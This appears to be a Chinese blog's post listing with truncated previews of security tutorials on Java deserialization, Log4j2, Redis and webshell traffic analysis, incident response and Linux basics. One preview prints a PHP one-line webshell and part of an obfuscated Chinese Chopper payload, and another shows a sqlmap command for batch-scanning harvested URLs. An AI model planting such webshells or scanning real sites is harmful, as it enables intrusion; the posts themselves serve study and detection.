目录 前言 T3协议概述 漏洞复现 修复措施 前言 WebLogicServer是一个企业级的应用服务器,由Oracle公司开发,支持完整的JavaEE规范,包括EJB、JSP、Servlet、JMS等,适合大型分布式应用和高负载场景。 T3协议概述 T3协议(Two-TierTCP/IPProtocol),是WebLogic中的一种专有协议,建立在TCP/IP协议之上,它是WebLogic的默认通信协议,主要用于在客户端和服务器之间进行通信。 在Weblogic中RMI通信的实现是使用T3协议(通常RMI通信使用的是JRMP协议),并且在T3的传输过程中,和RMI一样,会进行...

  Q68mX1P3tSGz   3小时前   4   0   0 网络安全

目录 前言 区块链和挖矿相关概念 挖矿木马 挖矿协议Stratum Stratum工作过程 XMR挖矿流量分析 环境搭建 流量分析 总结 前言 之前参与了一个关于“挖矿行为检测”的大创训练项目,在这里记录一下我关于挖矿相关内容的学习。 区块链和挖矿相关概念 区块链 首先需要了解一些关于区块链的内容。注意,区块链和挖矿是两个紧密相关但又各自独立的概念,它们并不是同一件事。 区块链是一种分布式账本技术,它通过去中心化的方式安全地记录交易数据。每个区块包含一组交易记录,并通过加密的方式与前一个区块链接起来,形成一个不可篡改的链式结构。这种设计使得区块链具有很高的安全性和透明性...

  Q68mX1P3tSGz   2天前   5   0   0 网络安全

目录 前言 NFStream NFStreamer PandasDataframe转换 CSV文件转换 NFStream特征提取 事后统计流特征提取 早期统计流特征提取 应用层可见性特征提取 系统的可见性 前言 之前介绍了关于stratum协议挖矿流量的一些内容,今天来介绍一下一款好用的流量特征提取工具NFStream,它可以很好的帮助我们从更深层次的角度来分析流量特征。 flowcontainer 再介绍NFStream之前,先来介绍一下flowcontainer,它也是基于python开发的一款网络流量基本信息提取库。 flowcontainer默认提取流的:源IP...

  Q68mX1P3tSGz   2天前   5   0   0 网络安全

目录 中国菜刀 蚁剑 菜刀和蚁剑的一句话木马的流量都有一个特点,都没有加密的,使用wireshark抓包来分析。 中国菜刀 中国菜刀是一款经典的webshell管理工具,具有文件管理、数据库管理、虚拟终端等功能。这里以菜刀2016为例。 在服务器准备php一句话木马:<?php@eval($_POST['pass']);?> Wireshark把80端口的数据包过滤出来,然后进行TCP流追踪: POST数据包中密码pass的内容: pass=array_map( "ass"."ert", array("ev"."Al(\"\\\$xx%3D\\\"Ba"."SE6...

  Q68mX1P3tSGz   2天前   4   0   0 网络安全

目录 漏洞原理 复现 反弹shell 漏洞修复 AApacheLog4j2是一个基于Java的日志记录工具,被广泛应用于业务系统开发,开发者可以利用该工具将程序的输入输出信息进行日志记录。Log4j2远程代码执行漏洞编号CVE-2021-44228。 漏洞原理 漏洞主要由于Log4j2在处理程序日志记录时存在JNDI入缺陷。JNDI是Java名称与目录接口,是一种查找其他组件、资源或服务的通用机制。利用这个缺陷,通过发送包含JNDI查找的恶意数据,触发Log4j2组件解析缺陷,实现远程代码执行。 Log4j2框架下的lookup查询服务提供了{}字段解析功能,传进去的值会被...

  Q68mX1P3tSGz   11天前   20   0   0 网络安全

目录 漏洞原理 复现 Fastjson1.2.24 Fastjson1.2.47 漏洞分析 Fastjson是阿里巴巴开源的一个Java库,用于将Java对象转换为JSON字符串(序列化),以及将JSON字符串转换为Java对象(反序列化),漏洞编号CVE-2017-18349。 漏洞原理 Fastjson引入了autoType功能,允许在反序列化过程中通过@type指定一个类的全限定名,Fastjson将会尝试创建该类的实例。 如果服务端反序列化了不可信的JSON数据,攻击者可以构造特定的JSON字符串,使得Fastjson在反序列化时实例化攻击者指定的类,并可能调用该类...

  Q68mX1P3tSGz   11天前   26   0   0 网络安全

目录 复现 环境准备 POC 漏洞原理分析 构造反射链 TransformedMap利用链 ApacheCommonsCollections的反序列化漏洞在2015年被曝光,引起了广泛的关注,算是java历史上最出名同时也是最具有代表性的反序列化漏洞。 复现 环境准备 jdk1.7版本下载压缩包链接:https://pan.baidu.com/s/1jdS4L9Yi4Gtrn8NYgwDhNQ提取码:l2wv commons-collections-3.1jar下载Jar包链接:https://nowjava.com/jar/detail/m02261225/comm...

  Q68mX1P3tSGz   11天前   23   0   0 网络安全

目录 前言 在Linux上部署Suricata Suricata的基本配置 配置文件 Suricata的规则 Suricata的使用 Suricata检测SQL注入 前言 Suricata是一个高性能的网络入侵检测和防御系统(IDS/IPS)。它是由OISF开发,完全开源,并且可以免费使用。 Suricata和Snort的区别,有什么优势? Snort也是一个开源的IDS,能够实时监控网络流量,检测和防御潜在的威胁。与Snort相比,Suricata的设计注重性能和可扩展性,它可以在低至中等规格的硬件上运行,支持多线程,同时处理高吞吐量的网络流量,同时流分析功能更为...

  Q68mX1P3tSGz   18天前   35   0   0 网络安全

目录 通用权限的管理 扩展权限的管理 特殊权限的管理 权限掩码 在Linux中,权限管理是通过文件系统中的权限位来实现的。 通用权限的管理 每个文件或目录都有一个所有者、一个用户组和其他用户的权限设置。主要的权限包括读取、写入和执行。 文件权限包括读、写和执行权限: 读权限(r):允许用户读取文件的内容或列出目录的内容 写权限(w):允许用户修改文件的内容或在目录中创建、删除和重命名文件 执行权限(x):允许用户执行文件,或允许用户进入目录 文件权限共有九个位,分为三组,每组三个位,分别为: 所有者权限:指定文件所有者的权限 所属组权限:指定文件所属组的权限 其他用户权限...

  Q68mX1P3tSGz   20天前   15   0   0 Linux

目录 Linux学习大纲 命令提示符 命令的格式 路径的分类 文件的分类 目录的结构 一些快捷键 Linux学习大纲 命令提示符 通常情况下,我们使用Linux都是在命令行环境下,所以学习Linux的第一步需要了解Linux的命令提示符。 Linux命令提示符通常由用户名、主机名和当前工作目录组成。 [user@hostnamedirectory]$ user代表当前登录的用户,@是分隔符,hostname是主机名,directory是当前所在的工作目录,$代表普通用户身份,代表超级用户(root)身份。 普通用户的家目录:/home/用户名/root的主目录:/root...

  Q68mX1P3tSGz   21天前   26   0   0 Linux

目录 文件权限 文件的三个时间戳 创建文件 创建目录 删除文件 文件的移动与复制 文件查看与编辑 重定向 查看文件详细信息 查找文件 文件属性的管理 文件的压缩和解压缩 文件的传输 “Linux下一切皆文件!” Everythingisafile是一个经典的概念。Linux系统将所有的东西都看作是文件,包括将硬件设备、进程、网络连接等均抽象为文件。 这也就意味着,用户可以使用同样的命令和工具来操作硬件设备和文件。比如使用cat命令可以读取一个普通文件,也可以读取键盘上输入的字符。 文件权限 文件权限是通过一系列权限位来管理的,这些权限位决定了文件对用户、组和其他用户的可读、可写...

  Q68mX1P3tSGz   21天前   16   0   0 Linux

目录 企业网三层架构 常见安全设备 网络区域划分 网络架构拓扑示例 企业网三层架构 在现代网络中,为了满足不同规模和需求的组织和企业的通信需求,网络架构通常会划分为多个层次,其中包括接入层、汇聚层和核心层。 接入层:是网络组网中最靠近用户的一层,主要任务是连接用户设备到网络,并提供用户访问网络的接口。 汇聚层:位于接入层和核心层之间,主要任务是连接多个接入层,并将数据流量聚合到核心层进行处理和转发。 核心层:是网络组网中最高级别的层次,负责处理大量的数据流量,并连接不同的汇聚层和网络服务。 较小规模的网络可能只包含一个接入层和一个核心层,而较大规模的网络可能会有多个接入层...

  Q68mX1P3tSGz   21天前   19   0   0 网络安全

目录 应急响应流程 账户排查 网络排查 进程排查 内存分析 日志分析 应急响应流程 PDCERF模型 P(Preparation准备):信息搜集,工具准备 D(Detection检测):了解资产现状,明确造成影响,尝试进行攻击路径溯源 C(Containment遏制):关闭端口、服务,停止进程,拔网线 E(Eradication根除):清除危险文件、进程 R(Recovery恢复):备份,恢复系统正常状态 F(follow-up跟踪):复盘事件全貌,总结汇报 账户排查 检查服务器是否存在:新增账户、隐藏账户、克隆账户、可疑账户。 检查远程管理端口是否对公网开放,服务器是否存...

  Q68mX1P3tSGz   22天前   29   0   0 网络安全

目录 用户排查 历史命令 网络排查 进程排查 文件排查 持久化排查 日志分析 通过系统运行状态、安全设备告警,主机异常现象来发现可疑现象通常的可疑现象有:资源占用、异常登录、异常文件、异常连接、异常进程等。 用户排查 如果发现异常用户活动,例如尝试多次登录失败、执行不正常的命令等,应该及时采取措施,包括禁止用户登录、修改用户密码等。 查看uid或gid为0的用户(默认系统只存在root一个特权账户) grep:0/etc/passwd 查看passwd文件的最后修改记录 stat/etc/passwd 统计所有用户的shell相关信息 cat/etc/passw...

  Q68mX1P3tSGz   22天前   19   0   0 网络安全

目录 Java反射机制 反射java.lang.Runtime ClassLoader类加载机制 URLClassLoader loadClass()与Class.forName()的区别? Java反射机制 Java反射(Reflection)是Java非常重要的动态特性。在运行状态中,通过Java的反射机制,我们能够判断一个对象所属的类。了解任意一个类的所有属性和方法。能够调用任意一个对象的任意方法和属性。 Java反射机制可以无视类方法、变量的访问权限修饰符,并且可以调用类的任意方法、访问并修改成员变量值。 对于一般的程序员来说反射的意义不大,对于框架开发者来说,...

  Q68mX1P3tSGz   28天前   34   0   0 网络安全

目录 ObjectInputStream和ObjectOutputStream java.io.Serializable 自定义序列化和反序列化 Java的序列化(Serialization)是指将对象转换为字节序列的过程,而反序列化(Deserialization)则是将字节序列转换回对象的过程。 序列化和反序列化通常用于在网络上传输对象或者将对象持久化到文件系统中。 Java提供了java.io.Serializable接口来支持对象的序列化和反序列化。如果一个类实现了Serializable接口,那么该类的对象就可以被序列化和反序列化。 ObjectInputStream...

  Q68mX1P3tSGz   28天前   23   0   0 网络安全

目录 JavaEE JavaMVC Servlet JSP Filter JDBC RMI JNDI JavaEE Java平台有3个主要版本: JavaSE(JavaPlatformStandardEdition,Java平台标准版) JavaEE(JavaPlatformEnterpriseEdition,Java平台企业版) JavaME(JavaPlatformMicroEdition,Java平台微型版) 其中JavaEE是Java应用最广泛的版本。JavaEE也称为Java2Platform或EnterpriseEdition(J2EE),它提供了一套全面的技术...

  Q68mX1P3tSGz   28天前   33   0   0 网络安全

目录 Redis 漏洞的产生条件及利用 Redis环境搭建 漏洞复现 利用Redis写入Webshell 利用Redis写入SSH公钥 利用Redis写入计划任务 Redis安全防护 Redis redis(remotedictionaryserver)是一个key-value存储系统,是跨平台的非关系型数据库。 redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的安全策略限制,redis服务会暴露在服务器公网上。如果此时又没有设置密码认证(默认为空),会导致任意用户在可以访问目标服务器的情况下未授权访问redis以及读取redis的数据。 漏洞的产生...

  Q68mX1P3tSGz   2024年04月18日   39   0   0 网络安全

攻防世界的一个php反序列化题unserialize3 PHP反序列化 序列化通俗来讲就是将对象转化为可以传输的字符串,反序列化就是把那串字符串再变回对象。 <?php classchybate{ var$test='123456'; } $cless1=newchybate; //序列化 $cless1_ser=serialize($cless1); echo$cless1_ser.'\n'; //反序列化 $cless1_user=unserialize($cless1_ser); print_r($cless1_user); ?> O:7:"chybate":1:{...

  Q68mX1P3tSGz   2024年04月18日   16   0   0 网络安全

目录 前言 slghack自动化搜集URL SqlmapAPI 脚本slghack_sqli 前言 挖掘SQL注入漏洞的一种方式就是通过GoogleHacking搜索那些可能存在SQL的URL,然后手工的探测注入点。但是现在的SQL注入漏洞的网站是比较少的了,所以这样一个一个手工测效率有一点低。 sqlmap比较好的一点是可批量扫描多个URL中的注入点,比如这样: 准备一个包含要扫描的URL列表的文件(每个URL占一行),然后使用-m选项指定要扫描的这个URL文件,执行如下的命令就可以: sqlmap-murls.txt--batch--level=3--random-agen...

  Q68mX1P3tSGz   2024年04月15日   50   0   0 网络安全
关注 更多

空空如也 ~ ~

粉丝 更多

空空如也 ~ ~